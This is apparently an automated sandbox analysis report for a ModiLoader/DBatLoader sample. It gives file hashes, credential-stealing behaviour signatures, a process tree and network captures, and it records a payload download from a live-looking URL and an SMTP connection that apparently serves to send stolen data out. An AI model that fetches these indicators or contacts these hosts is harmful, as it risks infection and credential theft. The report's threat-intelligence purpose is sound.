Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    144s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/05/2024, 01:29 UTC

General

  • Target

    22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57.exe

  • Size

    1.7MB

  • MD5

    ba58a19a6475eff2c5bb9b6dfc7d9dd3

  • SHA1

    407eda96d6cc766e17a6a27cf37cc63dd82537f3

  • SHA256

    22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57

  • SHA512

    6e53a2642c36cddc8cad22ca898c358d3393bd0a880fb5d364cb4aa38ef200b9b0b06dd03a13d05ef91e9867cb172eb2e05a021f0b28282028f8a1eaacdaf9e0

  • SSDEEP

    49152:mirGmwDGQ15rlkRH/7CG+xJZAOALfrSUv15gmm7kqQILp5ibWkT:miimqzwOALfrSUv15gmm7kqQILp5

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • ModiLoader Second Stage 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57.exe
    "C:\Users\Admin\AppData\Local\Temp\22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2356
    • C:\Users\Public\Libraries\huqnearJ.pif
      C:\Users\Public\Libraries\huqnearJ.pif
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4068

Network

  • flag-us
    DNS
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.dual-a-0034.a-msedge.net
    g-bing-com.dual-a-0034.a-msedge.net
    IN CNAME
    dual-a-0034.a-msedge.net
    dual-a-0034.a-msedge.net
    IN A
    204.79.197.237
    dual-a-0034.a-msedge.net
    IN A
    13.107.21.237
  • flag-us
    GET
    https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8On6eLEhfQPpLLi6eI4ca9jVUCUxBXa3teYfvxmPL61lVB35EOyoGJDxe2MhHEeRrzoJU_sMsnxcRryzagApTrDQYfoDKbz-MRw2t3HWMlMLkMfYOMmD2rRKmMeOiB5xM9l-Rwu2Zo1pzHuRlYfePjhyrZf45Ig15wx3hBUILIAbeWzUn%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D955e5cfb95f615ea39943ad03d67eee5&TIME=20240426T131420Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8On6eLEhfQPpLLi6eI4ca9jVUCUxBXa3teYfvxmPL61lVB35EOyoGJDxe2MhHEeRrzoJU_sMsnxcRryzagApTrDQYfoDKbz-MRw2t3HWMlMLkMfYOMmD2rRKmMeOiB5xM9l-Rwu2Zo1pzHuRlYfePjhyrZf45Ig15wx3hBUILIAbeWzUn%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D955e5cfb95f615ea39943ad03d67eee5&TIME=20240426T131420Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4 HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=2B633A4D347A628D1C382ECC35C1631B; domain=.bing.com; expires=Tue, 10-Jun-2025 01:30:05 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: E203CD298104488C836F168B0553DFA9 Ref B: LON04EDGE0810 Ref C: 2024-05-16T01:30:05Z
    date: Thu, 16 May 2024 01:30:05 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8On6eLEhfQPpLLi6eI4ca9jVUCUxBXa3teYfvxmPL61lVB35EOyoGJDxe2MhHEeRrzoJU_sMsnxcRryzagApTrDQYfoDKbz-MRw2t3HWMlMLkMfYOMmD2rRKmMeOiB5xM9l-Rwu2Zo1pzHuRlYfePjhyrZf45Ig15wx3hBUILIAbeWzUn%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D955e5cfb95f615ea39943ad03d67eee5&TIME=20240426T131420Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8On6eLEhfQPpLLi6eI4ca9jVUCUxBXa3teYfvxmPL61lVB35EOyoGJDxe2MhHEeRrzoJU_sMsnxcRryzagApTrDQYfoDKbz-MRw2t3HWMlMLkMfYOMmD2rRKmMeOiB5xM9l-Rwu2Zo1pzHuRlYfePjhyrZf45Ig15wx3hBUILIAbeWzUn%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D955e5cfb95f615ea39943ad03d67eee5&TIME=20240426T131420Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4 HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=2B633A4D347A628D1C382ECC35C1631B; _EDGE_S=SID=2874138F0E9A6FD7122B070E0FF66E1F
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=UQsCzyzobKxJGkGY2ukeQpRxIVn6dJZpu00UGps76YA; domain=.bing.com; expires=Tue, 10-Jun-2025 01:30:05 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 11C96EC9491346E9872A3ACB6040FC5A Ref B: LON04EDGE0810 Ref C: 2024-05-16T01:30:05Z
    date: Thu, 16 May 2024 01:30:05 GMT
  • flag-be
    GET
    https://www.bing.com/aes/c.gif?RG=6a29a8acbdab4f81a4b930eff69c0d43&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131420Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644
    Remote address:
    2.17.107.105:443
    Request
    GET /aes/c.gif?RG=6a29a8acbdab4f81a4b930eff69c0d43&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131420Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644 HTTP/2.0
    host: www.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=2B633A4D347A628D1C382ECC35C1631B
    Response
    HTTP/2.0 200
    cache-control: private,no-store
    pragma: no-cache
    vary: Origin
    p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 838F9BFFA3B843C59BC04819558435C8 Ref B: BRU30EDGE0616 Ref C: 2024-05-16T01:30:05Z
    content-length: 0
    date: Thu, 16 May 2024 01:30:05 GMT
    set-cookie: _EDGE_S=SID=2874138F0E9A6FD7122B070E0FF66E1F; path=/; httponly; domain=bing.com
    set-cookie: MUIDB=2B633A4D347A628D1C382ECC35C1631B; path=/; httponly; expires=Tue, 10-Jun-2025 01:30:05 GMT
    alt-svc: h3=":443"; ma=93600
    x-cdn-traceid: 0.656b1102.1715823005.52e95268
  • flag-us
    DNS
    17.160.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    17.160.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    237.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    237.197.79.204.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    105.107.17.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    105.107.17.2.in-addr.arpa
    IN PTR
    Response
    105.107.17.2.in-addr.arpa
    IN PTR
    a2-17-107-105deploystaticakamaitechnologiescom
  • flag-be
    GET
    https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    Remote address:
    2.17.107.105:443
    Request
    GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
    host: www.bing.com
    accept: */*
    cookie: MUID=2B633A4D347A628D1C382ECC35C1631B; _EDGE_S=SID=2874138F0E9A6FD7122B070E0FF66E1F; MSPTC=UQsCzyzobKxJGkGY2ukeQpRxIVn6dJZpu00UGps76YA; MUIDB=2B633A4D347A628D1C382ECC35C1631B
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-type: image/png
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QWthbWFp
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    content-length: 1107
    date: Thu, 16 May 2024 01:30:06 GMT
    alt-svc: h3=":443"; ma=93600
    x-cdn-traceid: 0.656b1102.1715823006.52e95749
  • flag-us
    DNS
    55.36.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    55.36.223.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    kamix.hu
    22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57.exe
    Remote address:
    8.8.8.8:53
    Request
    kamix.hu
    IN A
    Response
    kamix.hu
    IN A
    37.17.172.136
  • flag-hu
    GET
    https://kamix.hu/255_Jraenquhwco
    22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57.exe
    Remote address:
    37.17.172.136:443
    Request
    GET /255_Jraenquhwco HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: kamix.hu
    Response
    HTTP/1.1 200 OK
    Date: Thu, 16 May 2024 01:30:14 GMT
    Server: Apache
    Last-Modified: Tue, 14 May 2024 20:41:31 GMT
    Accept-Ranges: bytes
    Content-Length: 802976
    Cache-Control: s-maxage=10
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
  • flag-us
    DNS
    133.211.185.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.211.185.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    136.172.17.37.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    136.172.17.37.in-addr.arpa
    IN PTR
    Response
    136.172.17.37.in-addr.arpa
    IN PTR
    web01-136 szerverplexhu
  • flag-us
    DNS
    ip-api.com
    huqnearJ.pif
    Remote address:
    8.8.8.8:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com/line/?fields=hosting
    huqnearJ.pif
    Remote address:
    208.95.112.1:80
    Request
    GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Thu, 16 May 2024 01:30:19 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 20
    X-Rl: 43
  • flag-us
    DNS
    1.112.95.208.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    1.112.95.208.in-addr.arpa
    IN PTR
    Response
    1.112.95.208.in-addr.arpa
    IN PTR
    ip-apicom
  • flag-us
    DNS
    sslout.de
    huqnearJ.pif
    Remote address:
    8.8.8.8:53
    Request
    sslout.de
    IN A
    Response
    sslout.de
    IN A
    134.119.18.23
  • flag-us
    DNS
    50.23.12.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    50.23.12.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    56.126.166.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.126.166.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    35.15.31.184.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    35.15.31.184.in-addr.arpa
    IN PTR
    Response
    35.15.31.184.in-addr.arpa
    IN PTR
    a184-31-15-35deploystaticakamaitechnologiescom
  • flag-us
    DNS
    79.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    79.190.18.2.in-addr.arpa
    IN PTR
    Response
    79.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-79deploystaticakamaitechnologiescom
  • flag-us
    DNS
    43.58.199.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.58.199.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    77.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    77.190.18.2.in-addr.arpa
    IN PTR
    Response
    77.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-77deploystaticakamaitechnologiescom
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    dual-a-0001.a-msedge.net
    dual-a-0001.a-msedge.net
    IN A
    204.79.197.200
    dual-a-0001.a-msedge.net
    IN A
    13.107.21.200
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 555746
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 4D59345877ED4AAF8BA473149AE7F137 Ref B: LON04EDGE1212 Ref C: 2024-05-16T01:31:42Z
    date: Thu, 16 May 2024 01:31:41 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 415458
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: F5EF69A177154B0F9D4FD2A183703ED4 Ref B: LON04EDGE1212 Ref C: 2024-05-16T01:31:42Z
    date: Thu, 16 May 2024 01:31:41 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340783933_1QOIM48UV8MGOV4SU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239340783933_1QOIM48UV8MGOV4SU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 430689
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: F67825C00E5D4944AF3E70EDC8F22144 Ref B: LON04EDGE1212 Ref C: 2024-05-16T01:31:42Z
    date: Thu, 16 May 2024 01:31:41 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 638730
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: F5D2D0F6665F4F858A5A4EBFA3B279DD Ref B: LON04EDGE1212 Ref C: 2024-05-16T01:31:42Z
    date: Thu, 16 May 2024 01:31:41 GMT
  • flag-us
    DNS
    200.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.197.79.204.in-addr.arpa
    IN PTR
    Response
    200.197.79.204.in-addr.arpa
    IN PTR
    a-0001a-msedgenet
  • 204.79.197.237:443
    https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8On6eLEhfQPpLLi6eI4ca9jVUCUxBXa3teYfvxmPL61lVB35EOyoGJDxe2MhHEeRrzoJU_sMsnxcRryzagApTrDQYfoDKbz-MRw2t3HWMlMLkMfYOMmD2rRKmMeOiB5xM9l-Rwu2Zo1pzHuRlYfePjhyrZf45Ig15wx3hBUILIAbeWzUn%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D955e5cfb95f615ea39943ad03d67eee5&TIME=20240426T131420Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4
    tls, http2
    2.5kB
    9.0kB
    20
    17

    HTTP Request

    GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8On6eLEhfQPpLLi6eI4ca9jVUCUxBXa3teYfvxmPL61lVB35EOyoGJDxe2MhHEeRrzoJU_sMsnxcRryzagApTrDQYfoDKbz-MRw2t3HWMlMLkMfYOMmD2rRKmMeOiB5xM9l-Rwu2Zo1pzHuRlYfePjhyrZf45Ig15wx3hBUILIAbeWzUn%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D955e5cfb95f615ea39943ad03d67eee5&TIME=20240426T131420Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8On6eLEhfQPpLLi6eI4ca9jVUCUxBXa3teYfvxmPL61lVB35EOyoGJDxe2MhHEeRrzoJU_sMsnxcRryzagApTrDQYfoDKbz-MRw2t3HWMlMLkMfYOMmD2rRKmMeOiB5xM9l-Rwu2Zo1pzHuRlYfePjhyrZf45Ig15wx3hBUILIAbeWzUn%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D955e5cfb95f615ea39943ad03d67eee5&TIME=20240426T131420Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4

    HTTP Response

    204
  • 2.17.107.105:443
    https://www.bing.com/aes/c.gif?RG=6a29a8acbdab4f81a4b930eff69c0d43&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131420Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644
    tls, http2
    1.5kB
    5.4kB
    17
    12

    HTTP Request

    GET https://www.bing.com/aes/c.gif?RG=6a29a8acbdab4f81a4b930eff69c0d43&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131420Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644

    HTTP Response

    200
  • 2.17.107.105:443
    https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    tls, http2
    1.7kB
    6.4kB
    18
    13

    HTTP Request

    GET https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

    HTTP Response

    200
  • 37.17.172.136:443
    kamix.hu
    22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57.exe
    190 B
    92 B
    4
    2
  • 37.17.172.136:443
    https://kamix.hu/255_Jraenquhwco
    tls, http
    22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57.exe
    21.3kB
    834.6kB
    423
    604

    HTTP Request

    GET https://kamix.hu/255_Jraenquhwco

    HTTP Response

    200
  • 208.95.112.1:80
    http://ip-api.com/line/?fields=hosting
    http
    huqnearJ.pif
    310 B
    347 B
    5
    4

    HTTP Request

    GET http://ip-api.com/line/?fields=hosting

    HTTP Response

    200
  • 134.119.18.23:587
    sslout.de
    huqnearJ.pif
    260 B
    5
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.1kB
    16
    14
